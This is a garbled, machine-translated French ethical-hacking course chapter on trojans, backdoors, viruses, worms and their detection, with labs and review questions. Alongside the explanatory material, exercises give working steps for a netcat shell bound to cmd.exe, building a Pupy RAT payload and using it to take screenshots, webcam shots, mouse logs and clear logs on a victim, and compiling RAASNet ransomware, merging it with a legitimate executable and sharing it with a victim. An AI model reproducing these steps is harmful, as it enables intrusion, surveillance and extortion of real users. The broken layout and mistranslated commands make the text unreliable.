SOMMAIRE

• Chap01: Introduction au «piratage éthique»

• Chap02: Collecte d'informations sur les cibles: reconnaissance, empreinte et ingénierie sociale

• Chap03: Collecte des informations sur le réseau et l'hôte: analyse et énumération Chap04: SystemHacking: Cracking

• de mot de passe, escalade des privilèges et masquage de fichiers

• Chap05: chevaux de Troie, portes dérobées, virus et vers

• Chap06: Collecte de données à partir de réseaux: Sniffers Chap07:

• Déni de service et détournement de session

• Chap08: Piratage Web: Google, serveurs Web, vulnérabilités des applications Web et techniques de craquage de mots de passe

basées sur le Web

• Chap09: Attaquer les applications Web: injection SQL et débordements de tampon Chap10: Hacking

• de réseau sans fil

• Chap11: Sécurité du site physique Chap12:

• Piratage des systèmes Linux

• Chap13: Piratage des plates-formes mobiles (Android) Chap14:

• Cryptanalyse
ChaCphap Chap 5: chevaux de Troie, portes dérobées, virus,

55 OBJECTIFS COUVERTS DANS CE CHAP

et vers

01 Chap Qu'est-ce qu'un cheval de Troie?

07 Comment faire une connexion inversée
Les chevaux de Troie fonctionnent?

02 Qu'entend-on par manifeste

08 Quels sont les
contre-mesure
et les canaux secrets?
techniques de prévention

Comprendre Trojan

03 Énumérez les différents types de

09 Chevaux de Troie
éluder les techniques
Chevaux de Troie

04 Quels sont les

indications d'un cheval de Troie
dix Comprendre le
différences entre un

virus et un ver
attaque?

05 Comprendre comment le
Le cheval de Troie «Netcat» fonctionne
11 Comprendre
évasion antivirus

techniques

06 Ce que l'on entend par

«Emballage»?
12 Comprendre les méthodes de détection de virus
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 • Chevaux de Troie et les portes dérobées sont des types de malware utilisé
Chevaux de Troie et portes dérobées

pour infecter et compromettre les systèmes informatiques.

• ATrojan est un programme malveillant déguisé en quelque chose de

bénin. Dans de nombreux cas, le cheval de Troie semble remplir une

fonction souhaitable pour l'utilisateur, mais permet en fait à un pirate

d'accéder au système informatique de l'utilisateur.

• De nombreux chevaux de Troie sont utilisés pour manipuler les fichiers

sur l'ordinateur victime, gérer les processus, exécuter des commandes à

distance, intercepter les frappes, regarder les images d'écran et

redémarrer ou arrêter les hôtes infectés

• Des publicités sur des sites Internet pour des programmes gratuits , des

fichiers musicaux ou des fichiers vidéo incitent une victime à installer le

programme cheval de Troie

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées

Les 5 virus informatiques les plus connus

C RYPTO L OCKER ( ransomware)

1 • Sortie en septembre 2013
• Prend des fichiers en otage
JE T'AIME ( 2000)
• Diffuser les pièces jointes aux e-mails 2
• L'un des virus les plus connus et les plus destructeurs de tous
• wannacry et notpetya
les temps
• Téléchargé en cliquant sur une pièce jointe appelée
'LOVE-LETTER-FOR-YOU.TXT.vbs
• Écraser des types de fichiers aléatoires (y compris les fichiers
Office, les fichiers image et les fichiers audio

M Oui ré MOO
3 • Ver basé sur les e-mails
• En 2004, 16 à 25% de tous les e-mails avaient été infectés par
MyDoom.wannacry et notpetya
• MyDoom était étrange, car il a frappé des entreprises
technologiques comme SCO, Microsoft et Google avec une
attaque de déni de service distribué

S TORM W ORM ( 2006)

• cheval de Troie

• Transformez les victimes en zombies ou en robots pour continuer la

S TUXNET ( 2006) 4 propagation du virus et envoyer une énorme quantité de spam
• Virus le plus effrayant

5 • Stuxnet diffusé par une clé USB et

logiciel ciblé contrôlant une installation en Iran contenant de
l'uranium
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées

Chevaux de Troie d'accès à distance (RAT) sont une classe de portes dérobées utilisées pour activer à distance

contrôle sur une machine compromise. Ils fournissent des fonctions apparemment utiles à l'utilisateur et, en même temps,

ouvrent un port réseau sur l'ordinateur victime.

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées

Canaux ouverts et cachés
Un canal ouvert est la manière normale et légitime dont les programmes communiquent au sein d'un système

informatique ou d'un réseau. Un canal secret utilise des programmes ou des voies de communication d'une manière qui

n'était pas prévue.

Scénario du monde réel

Un exemple d'utilisation d'un ordinateur pour transmettre des informations via un canal secret est l'utilisation d'une

caractéristique d'un fichier pour fournir des informations plutôt que le fichier lui-même. Un exemple informatique

d'un canal secret est la création d'un fichier informatique apparemment innocent de 16 octets. Le fichier peut

contenir n'importe quelle donnée car ce ne sont pas les informations importantes. Le fichier peut ensuite être

envoyé par e-mail à une autre personne. Encore une fois, cela semble assez innocent mais la vraie

communication est du numéro 16. La taille du fichier est la donnée importante, pas le contenu du fichier
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Canaux ouverts et cachés

Chevaux de Troie et portes dérobées

Certains canaux cachés reposent sur une technique appelée tunneling, qui permet à un protocole d'être transporté sur un autre

protocole. Protocole de message de contrôle Internet ( ICMP) Le tunneling est une méthode d'utilisation de la demande d'écho et de la

réponse d'écho ICMP pour transporter toute charge utile qu'un attaquant peut souhaiter utiliser, dans une tentative d'accès furtif ou de

contrôle d'un système compromis. La commande ping est un outil de dépannage généralement accepté et utilise le protocole ICMP.

Pour cette raison, de nombreux routeurs, commutateurs, pare-feu et autres périphériques de filtrage de paquets permettent au protocole

ICMP d'être transmis à travers le périphérique. Par conséquent, ICMP est un excellent choix de protocoles de tunneling

Outil de piratage

Loki est un outil de piratage qui fournit un accès au shell via ICMP, ce qui le rend beaucoup plus

difficile à détecter que les portes dérobées TCP ou UDP. En ce qui concerne le réseau, une série de

paquets ICMP sont envoyés à travers le réseau. Cependant, le pirate envoie vraiment des

commandes depuis le client Loki et les exécute sur le serveur

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées • Types de chevaux de Troie

Trojans d'accès à distance Trojans d'envoi de données Trojans destructeurs

RAT

Utilisé pour accéder à Utilisé pour rechercher des Utilisé pour supprimer ou
distance à un système. données sur un système et fournir corrompre des fichiers sur
des données à un pirate informatique un système

Déni de service Trojans FTP Logiciel de sécurité

Désactiver les chevaux de Troie
Chevaux de Troie

Utilisé pour lancer un Utilisé pour créer un serveur FTP Utilisé pour arrêter le logiciel
attaque par déni de service afin de copier des fichiers sur un antivirus
système
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 •
Chevaux de Troie Trojans
et à connexion inversée
portes dérobées

Les chevaux de Troie à connexion inversée permettent à un attaquant d'accéder à une machine sur le réseau
interne de l'extérieur
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Trojans à connexion inversée

Chevaux de Troie et portes dérobées

Le pirate installe un simple cheval de

Troie sur un système du réseau interne,
tel que le serveur shell WWW inversé

Toutes les 60 secondes, le serveur interne

essaie d'accéder au système maître externe
pour récupérer
commandes

Si l'attaquant a tapé quelque chose dans le

système maître, cette commande est récupérée
et exécutée sur le
système
Le serveur shell WWW inversé utilise HTTP standard. C'est dangereux parce que c'est
difficile à détecter: il semble qu'un client navigue sur le Web à partir du réseau interne.
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie
Outiletde
portes dérobées
piratage

TROJ_QAZ est un cheval de Troie qui renomme l'application notepad.exe fichier sur note.com, puis se copie en tant que

notepad.exe dans le dossier Windows. Cela entraînera le lancement du cheval de Troie chaque fois qu'un utilisateur exécute le

Bloc-notes. Il dispose d'une porte dérobée qu'un utilisateur distant ou un pirate informatique peut utiliser pour se connecter et

contrôler l'ordinateur à l'aide du port 7597. TROJ_QAZ infecte également le registre afin qu'il soit chargé à chaque démarrage de

Windows

Renomme l'application
se copie comme
TROJ_QAZ

notepad.exe déposer vers

notepad.exe
note.com

un utilisateur exécute le Bloc-notes

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 E XERCISE
Chevaux de Troie 5.1:dérobées
et portes U CHANTER NETCAT

1. Copiez netcat depuis Outils \ Chap 5 \ netcat à votre C:

2. Lancez netcat en mode écoute (en tant que serveur):

nc.exe -L -p 123 -t -e cmd.exe

3. Sur Kali: exécutez la commande suivante pour vous connecter à l'écouteur Netcat sur le serveur:

nc <adresse IP du serveur> <port d'écoute sur le serveur>

4. Exécutez n'importe quelle commande à distance

C: \ Users \ sofien \ Desktop> netsh advfirewall définit l'état de tous les profils sur

Le client doit alors avoir un shell d'invite de commande ouvert à partir du serveur.
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux deSURVEILLANCE
Troie et portes dérobées
DU PORT ET T DÉTECTION DE ROJAN T OOLS

Fport signale tous les ports TCP / IP et UDP ouverts et les mappe à l'application propriétaire.

Vous pouvez utiliser fport pour identifier rapidement les ports ouverts inconnus et leurs

applications.

TCPView est un programme Windows qui affiche des listes détaillées de toutes les extrémités TCP et UDP

points sur le système, y compris les adresses locales et distantes et l'état de TCP

Connexions. Lorsque TCPView s'exécute, il énumère tous les points de terminaison TCP et UDP actifs,

résolution de toutes les adresses IP en leurs versions de nom de domaine.

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 E XERCISE 5.2: C VÉRIFIER UN S YSTEM

Chevaux de Troie et portes dérobées

• Vérification de la signature : sigverif

1. Windows + R

2. Tapez: sigverif

3. Choisissez Démarrer

4. Dans le programme sigverif, choisissez Avancé pour voir le rapport de vérification de signature

• Shwo tous les services: Liste de tâches

1. Windows + R

2. Tapez: cmd

3. Tapez: liste de tâches

4. Tapez: tasklist –m (vous donne tous les services, programmes et DLL)

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Chevaux de Troie et portes dérobées

E XERCISE 5.2: C VÉRIFIER UN S YSTEM (SUITE)

• Vérifiez l'intégrité des fichiers Windows: sfc

1. Exécutez cmd en tant qu'administrateur

2. Tapez: sfc / scannow

(prend du temps)
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 •
Types deLes virus sont classés selon deux facteurs: QUOI ils infectent et COMMENT
virus
ils infectent. Un virus peut infecter les composants suivants d'un système:

Macros
Des dossiers (Macros Microsoft Word)

Fichiers compagnons
Code source (fichiers système de prise en charge
comme les fichiers DLL et INI)

Clusters de disques
Fichiers batch
(Fichiers BAT)
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Types•de virus
Les virus sont classés en fonction de leur technique d'infection, comme suit:

S PARSE
je NFECTEURS
Infecter les fichiers dont
C AVITY
P OLYMORPHIQUE
(S RYTHME-
les longueurs sont dans
F ILLER) Crypter le code
Étroitement défini Attaché à
d'une manière différente
gammes ou dont zones vides de
avec chacun
les noms commencent par des dossiers
infection
lettres dans une certaine
plage de
alphabet

M ULTIPARTITE

S TEALTH
Avancée
les virus créent cacher la normale
plusieurs virus
infections les caractéristiques,
comme la modification
Votre F UN SUPPORT
Texte S FAIBLE
l'heure d'origine

UNE
RMORED gC vT eO rR yS et tampon à date du
Ici Infec je t NFE
dans
fichier
rapidement ou très
Crypté à lentement: laissez
prévenir
programme pour infecter
détection
un système sans
détection
vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Méthodes de détection desur

Basé virus
la signature ou
PatternMatching
Analyse heuristique
L'analyse heuristique est
Une signature est un algorithme ou similaire à la signature
un hachage (un nombre dérivé numérisation, sauf que
d'une chaîne de texte) qui au lieu de rechercher des
signatures spécifiques,
identifie de manière unique un aspect d'analyse heuristique
virus spécifique. pour certaines instructions
ou des commandes dans un
programme qui ne se trouvent pas
Basé sur des règles
dans les
Le composant du moteur
programmes d'application.
heuristique qui
effectue l'analyse
(l'analyseur) extraits
certaines règles d'un fichier et
Blocage comportemental
ces règles seront comparées à
Le comportement suspect
un ensemble de règles pour les
l'approche, en revanche, ne tente pas
d'identifier les virus connus, mais
code .
surveille plutôt le comportement de
tous les programmes.
bac à sable
Permet au fichier de s'exécuter
dans un environnement virtuel contrôlé

système (ou «bac à sable»)

pour voir ce qu'il fait.

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Exigences:
ExErCisE 5.3: Création d'un virus test pour C&C
VM Linux Kali Machine virtuelle Windows 7
Chiot connexion Internet

1- installer Pupy sur Kali Linux (déjà fait)

sudo apt installer git libssl1.0-dev python-dev python-pip build-essential swig tcpdump python-virtualenv
git clone --recursive https://github.com/n1nj4sec/pupy cd pupy

python create-workspace.py -DG pupyw sudo pip2

install rpyc == 3.4.4

2- Pour montrer l'aide de pupy:

root @ kali : ~ / cd pupy

root @ kali : ~ / export PATH = $ PATH: ~ / .local / bin;
root @ kali : ~ / pupy # pupygen –h

3- Générer une charge utile pour la machine Windows:

root @ kali : ~ / pupy # pupygen -O windows -A x86 -o /root/testcandc.exe

4- Démarrez la capture:

root @ kali : ~ / pupy # pupysh

5- Exporter le fichier vers la machine Windows et l'exécuter

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 6- Revenir à Capture et une session est ouverte

ExErCisE 5.3: Création d'un virus test pour C&C
7- Pour avoir des informations système sur la victime: get_info

8- Pour afficher la boîte de message sur la victime:

msgbox --title hack "vous avez été piraté"

9- démarrer cmd dans la victime: coquille

10- Pour faire une capture d'écran: capture d'écran

(pour ouvrir l'image: allez dans le répertoire et xdg-open nom_fichier, extension)

11- Pour verrouiller victimmachine: écran verrouillé

12- Pour enregistrer la webcam: webcamsnap

13- Pour capturer tous les événements de souris:

mouselogger start

«Faire du mouvement dans la victime»

mouselogger dump

arrêt mouselogger

14- Pour effacer tous les journaux: clear_logs

15- Voir tous les modules: aide moi

16- test d'autres modules

vue nette \\ < com
pC hune
C h une
p
pute ARN moi > Tro j ans, Backdoor s, Vi ruses et Worms

55 Victime: Windows 7 - Victim Attacker:

ExErCisEWindows 7 - Attacker(RAAS: Ransomware en tant que service)
5.7: Ransomware

Pas:
- Installez «Git pour Windows»: https: //gitforwindows.org/
- Installez python: python-3.7.4-amd64.exe
- Sur le document: Faites un clic droit et Git bash ici:
$ git clone https://github.com/leonv024/RAASNet.git $ cd RAASNet

$ pip install -r requirements.txt $ pip

install Oreiller
$ py RAASNet.py
• Créer un compte
• Générer une charge utile
• Lancer la compilation

• Ok pour compiler Decryptor

• Démarrer le serveur

• charge utile créée: RAASNet \ dist

Fusionner avec legitime exe (winrar par exemple):

Téléchargement msiexpress.exe (veekee.free.fr/petzouille/msiexpress.exe)
- Partagez-le pour la victime
 Tro j ans, Backdoor s, Vi ruses et Worms

ChaCphap

55 Chap 5 La revue Des questions

 Tro j ans, Backdoor s, Vi ruses et Worms

ChaCphap
1. Qu'est-ce qu'un emballage?

55
A. Un programme utilisé pour combiner un cheval de Troie et un logiciel légitime en un seul
exécutable
B. Un programme utilisé pour combiner un cheval de Troie et une porte dérobée en un seul

exécutable

C. Absence d'accès à un système soumis à un cheval de Troie

2. Quelle est la différence entre une porte dérobée et un cheval de Troie?

A. ATrojan fournit généralement une porte dérobée à un pirate informatique

Une porte dérobée doit d'abord être installée

C. ATrojan n'est pas un moyen d'accéder à un système

3. Comment supprimer un cheval de Troie d'un système?

UNE. Recherchez sur Internet des outils de suppression de logiciels gratuits.

B. Achetez des outils disponibles dans le commerce pour supprimer le cheval de Troie

C. Désinstaller et réinstaller toutes les applications

4. Qu'est-ce que le tunneling ICMP?

UNE. Tunnel des messages ICMP via HTTP

B. Tunnel d'un autre protocole via ICMP
C. Une chaîne ouverte
RÉ. Envoi de commandes ICMP en utilisant un protocole différent
 Tro j ans, Backdoor s, Vi ruses et Worms

ChaCphap

55
5. Qu'est-ce que le shell WWW inversé?

A. Connexion à un site Web à l'aide d'un tunnel

B. ATrojan qui se connecte du serveur au client en utilisant HTTP

C. ATrojan qui émet des commandes au client en utilisant HTTP

D. Connexion via un pare-feu

6. Lequel des énoncés suivants décrit les virus blindés?

A. Caché
B. Tunnelé
C. Crypté

7. Quelles sont les trois méthodes utilisées pour détecter un virus?

UNE. Balayage.

B. Contrôle d'intégrité
C. Comparaison des signatures de virus

RÉ. Règles de pare-feu

E. Détection d'anomalies IDS F.

F. Reniflement

8. Un virus qui peut provoquer plusieurs infections est appelé quel type de virus

A. Multipartite
B. Camouflage
C. Multi-infection